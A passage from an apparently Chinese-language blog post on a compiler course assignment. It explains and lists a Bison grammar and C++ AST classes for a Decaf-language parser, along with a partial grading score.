return(retval >= 1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

上述语法分析器可以完美完成第一个样例,大体包含了对以下部分的处理:

  • 类定义,函数定义,函数调用,函数声明,表达式,IF语句,语句块

我这里说明几点需要注意的地方

函数参数列表的问题:我们不能提前确定传入函数的参数个数,因此需要利用循环(FOR 语句的处理也是同理)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
para_list_use: para_usen { 
$$ = $1;
}
| { /* 没有参数 */
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

para_usen: para_use T_COMMA para_usen { /* 剩余多个参数 */
decafStmtList * para = (decafStmtList *)$3;
para->push_front($1);
$$ = para;
}
| para_use { /* 剩余一个参数 */
decafStmtList * para = new decafStmtList();
para->push_front($1);
$$ = para;
}
;
  • 当处理 para_list_use 时,会有2种情况:
    • 无参数,不需要处理
    • 有参数,进入 para_usen,对于每一个 para_usen 有2种情况:
      • 剩余多个参数:将 para_use 压栈,继续匹配 para_usen 循环处理
      • 剩余一个参数:将 para_use 压栈

常量取值问题:对于常量需要再词法分析时将其字符串拷贝进来

1
2
3
{all_char}                 { yylval.sval = new string(yytext);return T_CHARCONSTANT; }
{all_str} { yylval.sval = new string(yytext);return T_STRINGCONSTANT; }
{decimal_num}|{hex_num} { yylval.sval = new string(yytext);return T_INTCONSTANT; }

注释处理问题:注释需要在词法分析时进行匹配(最好不要返回 token)

1
2
"//"[^\n]*  	             { }
"/*"([^\*]|(\*)*[^\*/])*(\*)*"*/" { }

得分结果:

1
2
3
4
➜  decafast git:(master) ✗ python3 check.py  
Correct(dev): 42 / 134
Score(dev): 42.00
Total Score: 42.00

已经匹配了部分样例,剩下的就是完善加调整,最后写一个完整分析器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
%{
#include <iostream>
#include <ostream>
#include <string>
#include <cstdlib>
#include "default-defs.h"

int yylex(void);
int yyerror(char *);

// print AST?
bool printAST = true;

#include "decafast.cc"

using namespace std;

%}

%define parse.error verbose

%union{
class decafAST *ast;
std::string *sval;
}

%token T_PACKAGE T_EXTERN T_FUNC T_SEMICOLON T_COMMA T_CONTINUE T_FALSE T_TRUE T_VAR T_FOR T_NULL T_RETURN T_WHITESPACE
%token T_AND T_ASSIGN T_DIV T_DOT T_EQ T_RIGHTSHIFT T_GEQ T_GT T_LEFTSHIFT T_LEQ T_LT T_MINUS T_MOD T_MULT T_NEQ T_NOT T_OR T_PLUS
%token T_VOID T_INTTYPE T_BOOLTYPE T_STRINGTYPE
%token T_LCB T_RCB T_LPAREN T_RPAREN T_LSB T_RSB
%token T_COMMENT
%token T_BREAK T_ELSE T_IF T_WHILE
%token <sval> T_ID T_INTCONSTANT T_CHARCONSTANT T_STRINGCONSTANT

%type <ast> state_if state_while lvalues state_for state_break state_continue state_return exp assign assigns assignss method_call lvalue statements statement extern_list para_list_use para_usen para_use para_list_def block blockt var_decls var_decl method_decls method_decl decafpackage var_declp var_declps extern_def extern_defn extern_typen extern_type func_typen func_type method_type type

%right T_ASSIGN
%left T_OR
%left T_AND
%left T_EQ T_NEQ T_LT T_GT T_GEQ T_LEQ
%left T_PLUS T_MINUS
%left T_MULT T_DIV T_MOD T_RIGHTSHIFT T_LEFTSHIFT
%right T_NOT
%right T_UMINUS
%right T_LPAREN
%left T_RPAREN
%nonassoc T_IF
%nonassoc T_ELSE

%%

start: program

program: extern_list decafpackage{
ProgramAST *prog = new ProgramAST((decafStmtList *)$1, (PackageAST *)$2);
if (printAST) {
cout << getString(prog) << endl;
}
delete prog;
}
;

/* extern_list: zero or more extern declarations, as a decafStmtList.
   The empty case is produced by extern_defn, which already derives the empty
   string and yields a fresh empty list. A second empty alternative here made
   the grammar ambiguous (reduce/reduce conflict), so it is omitted. */
extern_list: extern_defn {
    $$ = $1;
}
;

extern_defn: extern_def extern_defn {
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

extern_def: T_EXTERN T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type T_SEMICOLON {
decafEXFuncDef *func = new decafEXFuncDef();
decafPara* para = (decafPara*)$5;
decafType * type = (decafType *)$7;
func->put_name($3);
func->put_type(type->get_type());
func->put_para((decafPara*)para);
$$ = func;
delete $3;
}
;

para_list_use: para_usen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

para_usen: para_use T_COMMA para_usen {
decafStmtList * para = (decafStmtList *)$3;
para->push_front($1);
$$ = para;
}
| para_use {
decafStmtList * para = new decafStmtList();
para->push_front($1);
$$ = para;
}
;

/* para_use: a single argument in a method call.
   Method calls are already expressions (exp: method_call), so listing
   method_call here as well only produced a reduce/reduce conflict; both
   paths pass the same node through unchanged. */
para_use: exp { $$ = $1; }
;


para_list_def: extern_typen {
$$ = $1;
}
| func_typen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

func_typen: func_type T_COMMA func_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| func_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

func_type: T_ID extern_type {
decafType* type = (decafType*)$2;
type->put_name(*$1);
$$ = type;
delete $1;
}
;

extern_typen: extern_type T_COMMA extern_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| extern_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

extern_type: T_STRINGTYPE { decafType* type = new decafType("StringType"); $$ = type;}
| type { decafType* type = (decafType* )$1; $$ = type;}
;

method_type: T_VOID { decafType* type = new decafType("VoidType"); $$ = type;}
| type { decafType* type = (decafType* )$1; $$ = type;}
;

type: T_INTTYPE { decafType* type = new decafType("IntType"); $$ = type;}
| T_BOOLTYPE { decafType* type = new decafType("BoolType"); $$ = type;}
;

decafpackage: T_PACKAGE T_ID T_LCB var_declps method_decls T_RCB {
decafVarList *field = (decafVarList *)$4;
decafStmtList *method = (decafStmtList *)$5;
$$ = new PackageAST(*$2, field, method);
delete $2;
}
| T_PACKAGE T_ID T_LCB T_RCB {
$$ = new PackageAST(*$2, new decafVarList(), new decafStmtList());
delete $2;
}
;

var_declps: var_declp var_declps {
decafVarList *slist = (decafVarList *)$2;
slist->cat_front((decafVarList *)$1);
$$ = slist;
}
| {
decafVarList *slist = new decafVarList();
$$ = slist;
}
;

var_declp: T_VAR lvalues type T_SEMICOLON {
decafType * type = (decafType *)$3;
decafVarList * list = (decafVarList *)$2;
list->put_types(type->get_type());
list->put_kinds("Scalar");
$$ = list;
}
| T_VAR lvalue type T_ASSIGN exp T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
decafAllexp * exp = (decafAllexp *)$5;
var->put_kind("Scalar");
var->put_type(type->get_type());
var->put_exp(exp);
list->push_front(var);
$$ = list;
}
| T_VAR lvalue type T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
var->put_kind("Scalar");
var->put_type(type->get_type());
list->push_front(var);
$$ = list;
}
;

var_decls: var_decl var_decls {
decafVarList *slist = (decafVarList *)$2;
slist->cat_front((decafVarList *)$1);
$$ = slist;
}
| {
decafVarList *slist = new decafVarList();
$$ = slist;
}
;

var_decl: T_VAR lvalue type T_ASSIGN exp T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
decafAllexp * exp = (decafAllexp *)$5;
var->put_type(type->get_type());
var->put_exp(exp);
list->push_front(var);
$$ = list;
}
| T_VAR lvalues type T_SEMICOLON {
decafType * type = (decafType *)$3;
decafVarList * list = (decafVarList *)$2;
list->put_types(type->get_type());
$$ = list;
}
| T_VAR lvalue type T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
var->put_type(type->get_type());
list->push_front(var);
$$ = list;
}
;

lvalues: lvalue T_COMMA lvalues {
decafVar* var = (decafVar*)$1;
decafVarList * list = (decafVarList*)$3;
list->push_back(var);
$$=list;
}
| lvalue {
decafVar* var = (decafVar*)$1;
decafVarList * list = new decafVarList();
list->push_back(var);
$$=list;
}
;

lvalue: T_ID { decafVar* var = new decafVar(*$1) ;$$ = var; delete $1;}
| T_ID T_LSB exp T_RSB {
decafVar* var = new decafVar(*$1) ;
decafAllexp* arr = (decafAllexp *)$3;
var->put_arr(arr);
var->put_kind("Array("+arr->get_name()+")");
$$ = var;
delete $1;
}
;

CONSTANT : T_INTCONSTANT | T_CHARCONSTANT | T_STRINGCONSTANT { };

method_decls: method_decl method_decls{
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

method_decl: T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type block {
decafFuncDef *func = new decafFuncDef();
decafPara* para = (decafPara*)$4;
decafStmtList * block = (decafStmtList*)$7;
decafType * type = (decafType *)$6;
func->put_name($2);
func->put_type(type->get_type());
func->put_para(para);
func->put_block(block);
$$ = func;
delete $2;
}
;

blockt: T_LCB var_decls statements T_RCB {
decafStmtList *field = (decafStmtList *)$2;
decafStmtList *state = (decafStmtList *)$3;
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafStmtList *field = new decafStmtList();
decafStmtList *state = new decafStmtList();
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
;

block: T_LCB var_decls statements T_RCB {
decafStmtList *field = (decafStmtList *)$2;
decafStmtList *state = (decafStmtList *)$3;
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafStmtList *field = new decafStmtList();
decafStmtList *state = new decafStmtList();
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
;

statements: statement statements {
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

/* statement: one statement inside a block; each alternative forwards the
   node built by the sub-rule. Simple statements carry their own semicolon
   here, while block-structured ones (block, if, while, for) do not.
   There is deliberately no empty alternative: "no statement" is handled by
   the empty case of `statements`. An empty alternative here conflicted with
   it and would have left $$ unset. */
statement: blockt { $$ = $1; }
    | assign T_SEMICOLON { $$ = $1; }
    | method_call T_SEMICOLON { $$ = $1; }
    | state_return T_SEMICOLON { $$ = $1; }
    | state_if { $$ = $1; }
    | state_while { $$ = $1; }
    | state_for { $$ = $1; }
    | state_break T_SEMICOLON { $$ = $1; }
    | state_continue T_SEMICOLON { $$ = $1; }
    ;

state_if: T_IF T_LPAREN exp T_RPAREN blockt T_ELSE blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafBlock *else_block = (decafBlock *)$7;
decafIF *ifs = new decafIF(exp,if_block,else_block);
$$ = ifs;
}
| T_IF T_LPAREN exp T_RPAREN blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafIF *ifs = new decafIF(exp,if_block,NULL);
$$ = ifs;
}
;

state_while: T_WHILE T_LPAREN exp T_RPAREN blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *block = (decafBlock *)$5;
decafWhile *whiles = new decafWhile(exp,block);
$$ = whiles;
}
;

state_for: T_FOR T_LPAREN assignss T_SEMICOLON exp T_SEMICOLON assignss T_RPAREN blockt{
decafAllexp *exp = (decafAllexp *)$5;
decafBlock *block = (decafBlock *)$9;
decafAssignList *aslist = (decafAssignList *)$3;
decafAssignList *aslist2 = (decafAssignList *)$7;
decafFor * fors = new decafFor(exp,block,aslist,aslist2);
$$ = fors;
}
;

state_break: T_BREAK {
decafOutput * data = new decafOutput("BreakStmt");
$$ = data;
}
;

state_continue: T_CONTINUE {
decafOutput * data = new decafOutput("ContinueStmt");
$$ = data;
}
;

state_return: T_RETURN T_LPAREN exp T_RPAREN {
decafAllexp *exp = (decafAllexp *)$3;
decafReturn *ret = new decafReturn(exp);
$$ = ret;
}
| T_RETURN T_LPAREN T_RPAREN {
decafReturn *ret = new decafReturn(NULL);
$$ = ret;
}
| T_RETURN {
decafReturn *ret = new decafReturn(NULL);
$$ = ret;
}
;

assignss : assigns {
$$ = $1;
}
| {
decafAssignList *aslist = new decafAssignList();
$$ = aslist;
}
;

assigns: assign T_COMMA assigns {
decafAssignList *aslist = (decafAssignList *)$3;
decafAssign *ass = (decafAssign *)$1;
aslist->push_front(ass);
$$ = aslist;
}
| assign {
decafAssignList *aslist = new decafAssignList();
decafAssign *ass = (decafAssign *)$1;
aslist->push_front(ass);
$$ = aslist;
}
;

assign: lvalue T_ASSIGN exp {
decafVar* var = (decafVar *)$1;
decafAllexp* exp = (decafAllexp *)$3;
decafAssign* ass = new decafAssign(var->get_name(),exp,NULL);
ass->put_arr(var->get_arr());
$$ = ass;
}
;

/* exp: expressions.
   Operator precedence and associativity come from the %left/%right
   declarations in the declarations section; unary minus uses %prec T_UMINUS.
   Tokens typed <sval> carry a heap-allocated std::string. Every action that
   consumes one copies the text into the new node and then deletes the string;
   the constant alternatives previously leaked it. */
exp : T_ID { decafAllexp * exp = new decafAllexp(*$1,"VariableExpr"); $$ = exp; delete $1; }
    | T_ID T_LSB exp T_RSB {
        /* array element: name[index] */
        decafAllexp * exp = (decafAllexp *)$3;
        decafArrexp * arr = new decafArrexp(*$1,exp);
        $$ = arr;
        delete $1;
    }
    | T_INTCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; delete $1; }
    | T_CHARCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; delete $1; }
    | T_STRINGCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"StringConstant"); $$ = exp; delete $1; }
    | T_TRUE { decafAllexp * exp = new decafAllexp("True","BoolExpr"); $$ = exp; }
    | T_FALSE { decafAllexp * exp = new decafAllexp("False","BoolExpr"); $$ = exp; }
    | method_call { $$ = $1; }
    | T_NOT exp { decafUnaryexp * exp = new decafUnaryexp("Not", (decafAllexp*)$2); $$ = exp; }
    | T_MINUS exp %prec T_UMINUS { decafUnaryexp * exp = new decafUnaryexp("UnaryMinus", (decafAllexp*)$2); $$ = exp; }
    | exp T_PLUS exp { decafBinexp * exp = new decafBinexp("Plus", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_MINUS exp { decafBinexp * exp = new decafBinexp("Minus", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_MULT exp { decafBinexp * exp = new decafBinexp("Mult", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_DIV exp { decafBinexp * exp = new decafBinexp("Div", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_MOD exp { decafBinexp * exp = new decafBinexp("Mod", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_LEFTSHIFT exp { decafBinexp * exp = new decafBinexp("Leftshift", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_RIGHTSHIFT exp { decafBinexp * exp = new decafBinexp("Rightshift", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_LEQ exp { decafBinexp * exp = new decafBinexp("Leq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_GEQ exp { decafBinexp * exp = new decafBinexp("Geq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_LT exp { decafBinexp * exp = new decafBinexp("Lt", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_GT exp { decafBinexp * exp = new decafBinexp("Gt", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_EQ exp { decafBinexp * exp = new decafBinexp("Eq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_NEQ exp { decafBinexp * exp = new decafBinexp("Neq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_AND exp { decafBinexp * exp = new decafBinexp("And", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | exp T_OR exp { decafBinexp * exp = new decafBinexp("Or", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
    | T_LPAREN exp T_RPAREN { $$ = $2; }
    ;

method_call: T_ID T_LPAREN para_list_use T_RPAREN {
decafFunCall *call = new decafFunCall();
decafStmtList* para = (decafStmtList*)$3;
call->put_name($1);
call->put_para(para->get_para());
$$ = call;
delete $1;
}
;

%%

int main() {
    // Run the generated parser; the grammar actions build the abstract syntax tree.
    const int status = yyparse();
    // Any parser result of 1 or more is reported as a failure exit code.
    if (status >= 1) {
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS;
}

其中用到的类与函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
#include "default-defs.h"
#include <list>
#include <ostream>
#include <iostream>
#include <sstream>
#include <map>

#ifndef YYTOKENTYPE
#include "decafast.tab.h"
#endif

using namespace std;

/// decafAST - Base class for all abstract syntax tree nodes.
/// Subclasses override str() to produce their textual form.
class decafAST {
public:
    /// Virtual so that deleting through a decafAST* runs the subclass destructor.
    virtual ~decafAST() {}

    /// Textual form of the node; the base class yields an empty string.
    virtual string str() {
        string empty("");
        return empty;
    }
};

/// Return d->str(), or the literal "None" when d is a null pointer.
string getString(decafAST *d) {
    if (d == NULL) {
        return string("None");
    }
    return d->str();
}

/// Join the str() of every element of `vec` with commas.
///
/// A separator is only emitted while the accumulated text is non-empty, so
/// leading elements whose str() is empty leave no trace. When the result is
/// empty (no elements, or only empty strings) the literal "None" is returned.
template <class T>
string commaList(list<T> vec) {
    string joined("");
    for (auto &item : vec) {
        if (!joined.empty()) {
            joined += string(",");
        }
        joined += item->str();
    }
    if (joined.empty()) {
        return string("None");
    }
    return joined;
}

/// decafAllexp - leaf expression node, rendered as Kind(Name).
///
/// For kind "NumberExpr" the constructor rewrites some literal spellings of
/// Name into a decimal number:
///   * an escape-sequence character literal such as '\n' -> its character code
///   * a single character                               -> that character minus 48
///   * a 3-character quoted literal such as 'a'         -> the code of the middle char
/// Any other spelling is kept unchanged.
class decafAllexp : public decafAST {
    string Kind;
    string Name;

    /// Escape-sequence literals (spelled with their quotes) mapped to character
    /// codes. Built once and shared, instead of being rebuilt for every node.
    static const map<string,int>& escapeTable() {
        static const map<string,int> tab = {
            {"'\\t'",'\t'},
            {"'\\r'",'\r'},
            {"'\\n'",'\n'},
            {"'\\a'",'\a'},
            {"'\\v'",'\v'},
            {"'\\b'",'\b'},
            {"'\\f'",'\f'},
            {"'\\\\'",'\\'},
            {"'\\\''",'\''},
            {"'\\\"'",'\"'},
        };
        return tab;
    }
public:
    string get_name(){ return this->Name; }

    /// Members are initialised in declaration order (Kind, then Name).
    decafAllexp(string name,string kind) : Kind(kind), Name(name) {
        if (Kind != "NumberExpr") {
            return;
        }
        const map<string,int>& tab = escapeTable();
        map<string,int>::const_iterator hit = tab.find(this->Name);
        if (hit != tab.end()) {
            this->Name = to_string(hit->second);
        }
        else if (this->Name.size() == 1) {
            // 48 is the code of '0', so a single digit maps to its numeric value.
            this->Name = to_string(Name[0]-48);
        }
        else if (this->Name.size() == 3 && ( this->Name[0]=='\'' || this->Name[0]=='\"' )) {
            // Quoted single character: use the code of the character between the quotes.
            this->Name = to_string(Name[1]);
        }
    }

    string str() { return Kind + "(" + Name + ")"; }
};

/// decafArrexp - array element reference, rendered as ArrayLocExpr(name,index).
class decafArrexp : public decafAST {
    string Name;
    decafAllexp * Exp;   // index expression; this class never deletes it
public:
    decafArrexp(string Name, decafAllexp *Exp)
        : Name(Name), Exp(Exp) {}

    string str() {
        string out("ArrayLocExpr");
        out += "(";
        out += Name;
        out += ",";
        out += getString(Exp);
        out += ")";
        return out;
    }
};

/// decafBinexp - binary expression, rendered as BinaryExpr(op,lhs,rhs).
class decafBinexp : public decafAST {
    string Option;        // operator name, e.g. "Plus"
    decafAllexp * Exp1;   // left operand
    decafAllexp * Exp2;   // right operand
public:
    decafBinexp(string op, decafAllexp *exp1, decafAllexp *exp2)
        : Option(op), Exp1(exp1), Exp2(exp2) {}

    string str() {
        const string lhs = getString(Exp1);
        const string rhs = getString(Exp2);
        return string("BinaryExpr") + "(" + Option + "," + lhs + "," + rhs + ")";
    }
};

/// decafUnaryexp - unary expression, rendered as UnaryExpr(op,operand).
class decafUnaryexp : public decafAST {
    string Option;        // operator name, e.g. "UnaryMinus"
    decafAllexp * Exp1;   // operand
public:
    decafUnaryexp(string op, decafAllexp *exp1)
        : Option(op), Exp1(exp1) {}

    string str() {
        const string operand = getString(Exp1);
        return string("UnaryExpr") + "(" + Option + "," + operand + ")";
    }
};

/// decafType - a typed (optionally named) definition.
/// Rendered as VarDef(name,type), or VarDef(type) while no name is set.
class decafType : public decafAST {
    string Type;
    string Name;
public:
    decafType(string Type) : Type(Type) {}

    string get_type() { return this->Type; }
    void put_name(string Name) { this->Name = Name; }

    string str() {
        if (Name == "") {
            return "VarDef("+Type+")";
        }
        return "VarDef("+Name+","+Type+")";
    }
};

class decafVar : public decafAST {
string Type;
string Name;
string Kind;
decafAllexp* Exp;
decafAllexp* Arr;
public:
decafVar(string Name) {this->Name = Name;}
string get_type(){return this->Type;}
string get_name(){return this->Name;}
decafAllexp* get_arr(){return this->Arr;}
decafAllexp* get_exp(){return this->Exp;}
void put_type(string Type){this->Type = Type;}
void put_name(string Name){this->Name = Name;}
void put_kind(string Kind){
if(this->Kind == "")
this->Kind = Kind;
}
void put_arr(decafAllexp* Arr){this->Arr = Arr;}
void put_exp(decafAllexp* Exp){this->Exp = Exp;}
string str() {
if(Exp != NULL){
return "AssignGlobalVar("+Name+","+Type+","+getString(Exp)+")";
}
else if(Kind != "" && Name != ""){
return "FieldDecl("+Name+","+Type+","+Kind+")";
}
else if(Name != ""){
return "VarDef("+Name+","+Type+")";
}
else{
return "VarDef("+Type+")";
}
}
};

class decafVarList : public decafAST {
list<decafVar*> List;
public:
list<decafVar*> get_list(){return this->List; }
int size() { return List.size(); }
void push_front(decafVar *e) { List.push_front(e); }
void push_back(decafVar *e) { List.push_back(e); }
void cat_front(decafVarList* List) {
list<decafVar*> l = List->get_list();
for(auto e:l){
this->List.push_front(e);
}
}
void put_types(string Type){
for(auto e:this->List){
e->put_type(Type);
}
}
void put_kinds(string Kind){
for(auto e:this->List){
e->put_kind(Kind);
}
}
string str() {return commaList<class decafVar *>(List);}
};


/// decafStmtList - List of Decaf statements
class decafStmtList : public decafAST {
list<decafAST *> stmts;
public:
decafStmtList() {}
~decafStmtList() {
for (list<decafAST *>::iterator i = stmts.begin(); i != stmts.end(); i++) {
delete *i;
}
}
int size() { return stmts.size(); }
void push_front(decafAST *e) { stmts.push_front(e); }
void push_back(decafAST *e) { stmts.push_back(e); }
list<decafAST *> get_para(){return stmts; }
string str() { return commaList<class decafAST *>(stmts); }
};

class decafAssign : public decafAST {
string Var;
bool key;
decafAllexp* Arr;
decafAllexp* Exp;
decafAllexp* Exp2;
public:
void put_arr(decafAllexp* Arr){this->Arr = Arr;}
void put_key(bool key){this->key = key;}
decafAssign(string Var,decafAllexp* Exp,decafAllexp* Exp2):Var(Var),Exp(Exp),Exp2(Exp2){}
string str() {
if(Arr == NULL)
return string("AssignVar") + "(" + Var + "," + getString(Exp) + ")";
else
return string("AssignArrayLoc") + "(" + Var + "," + getString(Arr)+","+ getString(Exp) + ")";
}
};

class decafAssignList : public decafAST {
list<decafAssign *>List;
public:
int size() { return List.size(); }
void push_front(decafAssign *e) { List.push_front(e); }
void push_back(decafAssign *e) { List.push_back(e); }
void put_keys(bool key){
for(auto ass:List){
ass->put_key(key);
}
}
string str() {
return commaList<class decafAssign *>(List);
}
};

/// decafFunCall - method call, rendered as MethodCall(name,args).
class decafFunCall : public decafAST {
    string Name;
    list<decafAST *> Para;   // argument nodes; this class never deletes them
public:
    void put_para(list<decafAST *> Para) { this->Para = Para; }
    /// Copies the pointed-to string; the caller keeps ownership of *Name.
    void put_name(string *Name) { this->Name = *Name; }

    string str() {
        const string args = commaList<class decafAST *>(Para);
        return string("MethodCall") + "(" + Name + "," + args + ")";
    }
};

/// decafOutput - node whose textual form is a pre-rendered string.
class decafOutput : public decafAST {
    string Data;
public:
    decafOutput(string Data) : Data(Data) {}

    /// Returns the stored text unchanged.
    string str() { return Data; }
};

/// decafPara - ordered parameter list (decafType nodes), rendered comma-separated.
class decafPara : public decafAST {
    list<decafType *> Para;
public:
    int size() { return Para.size(); }
    void push_front(decafType *e) { Para.push_front(e); }
    void push_back(decafType *e) { Para.push_back(e); }
    /// Returns a copy of the pointer list.
    list<decafType *> get_para() { return Para; }
    string str() { return commaList<class decafType *>(Para); }
};

/// PackageAST - a package: its name, field declarations and method declarations.
/// The destructor deletes both lists.
class PackageAST : public decafAST {
    string Name;
    decafVarList *FieldDeclList;
    decafStmtList *MethodDeclList;
public:
    PackageAST(string name, decafVarList *fieldlist, decafStmtList *methodlist)
        : Name(name), FieldDeclList(fieldlist), MethodDeclList(methodlist) {}

    ~PackageAST() {
        // Deleting a null pointer is a no-op, so no explicit NULL test is needed.
        delete FieldDeclList;
        delete MethodDeclList;
    }

    string str() {
        const string fields = getString(FieldDeclList);
        const string methods = getString(MethodDeclList);
        return string("Package") + "(" + Name + "," + fields + "," + methods + ")";
    }
};

class decafFuncDef : public decafAST {
string Name;
string Type;
decafPara * Para;
decafStmtList * Block;
public:
void put_para(decafPara * Para){ this->Para = Para;}
void put_name(string *Name){ this->Name = *Name; }
void put_type(string Type){ this->Type = Type; }
void put_block(decafStmtList *Block){ this->Block = Block; }
string str() {
return string("Method") + "(" + Name + "," + Type + "," + getString(Para) + "," + getString(Block) + ")";
}
};

class decafEXFuncDef : public decafAST {
string Name;
string Type;
decafPara* Para;
public:
void put_para(decafPara* Para){ this->Para = Para;}
void put_name(string *Name){ this->Name = *Name; }
void put_type(string Type){ this->Type = Type; }
string str() {
return string("ExternFunction") + "(" + Name + "," + Type + "," + getString(Para) + ")";
}
};

